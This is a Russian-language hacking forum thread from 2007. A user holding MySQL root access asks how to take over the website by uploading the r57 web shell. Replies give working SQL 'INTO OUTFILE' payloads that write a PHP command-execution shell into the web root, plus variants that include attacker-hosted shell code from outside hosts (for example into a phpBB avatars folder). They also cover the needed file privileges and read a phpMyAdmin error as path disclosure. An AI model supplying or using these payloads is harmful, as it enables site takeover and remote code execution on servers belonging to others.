PDA

Просмотр полной версии : MySQL и root доступ


Gargulia
15.07.2007, 14:49
народ есть такая проблемка: имеется root доступ к MySQL... как подмять по себя сайт, r57 кидануть?
былобы все проще если бы на сервере были скрипты работающие с MySQL, но таковых не нашлось... вот сижу и туплю - че делать?

Ni0x
15.07.2007, 15:06
все зависит от твоей цели, если нужен сайт, то залей шелл.

n1†R0x
15.07.2007, 15:06
либо remote connect любым клиентом, гоу ту гугл.. если нет возможности удаленно управлять базой, то нужно залить на сервер какой-нибудь пхп-скрипт, недавно выкладывали РСТшные релизы, там была тулза для локальной работы с дб. ищи на форуме =)

Gargulia
15.07.2007, 15:33
народ вы меня видимо немножко не так поняли...
У меня уже есть root к базе, я не знаю как залить туда шелл, вот в чем проблема...
есть какиенибудь мыслишки?

Ni0x
15.07.2007, 15:40
используй
INTO OUTFILE

helat
15.07.2007, 15:43
я понял что ему надо.
ему надо через бд залить шелл.
Ты говориш что нет скриптов какие работают с бд.
такоко не может быть ибо бессмысленно было ставить мускул (ведь это не хостинг (Тк как рута на хостинге врятли можно взять))
Гдето на форуме писали что через команду мускула льёться шелл.
поиши что то типа Шелл через бд или в этом роде

Zitt
15.07.2007, 15:47
Узнаешь DOCUMENT_ROOT, потом
select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';

helat
15.07.2007, 15:51
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Вот был пример с пхп ББ

ENFIX
15.07.2007, 15:56
Это если filepriv включен =)
и есть права на запись в папку

Gargulia
15.07.2007, 16:49
всем спасибо.... я уже догнал Ni0x доходчиво объяснил....
а за это: select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';

отдельное спасибо, ато я страдал сначало с маленьким шелом(прямо в запросе SELECT), что б патом тока через него залить r57...

Gargulia
15.07.2007, 17:25
Господа что означает такой ответ:

Warning: Cannot modify header information - headers already sent by (output started at с:\www\sql\libraries\header_meta_style.inc.php:27 ) in
с:\www\sql\libraries\common.lib.php on line 1154

это в phpMyAdmin...

n1†R0x
15.07.2007, 20:22
он означает раскрытие пути =)
если серьезно, такая ошибка возникает, когда хедеры передаются как в целевом файле, так и в файле, который подключается с помощью include or require.

в данном случае - хз ) имхо криво поставили phpmyadmin, если такая ошибка вылетает по дефолту.

Gargulia
16.07.2007, 00:01
блин я уже задолбался.... как еще можно залить шелл имея лишь root к MySQL...? или эту ошибку может как нить можно устранить?
блин аж абидна - имея рута на мускл сижу сложа руки нихера сделать не могу...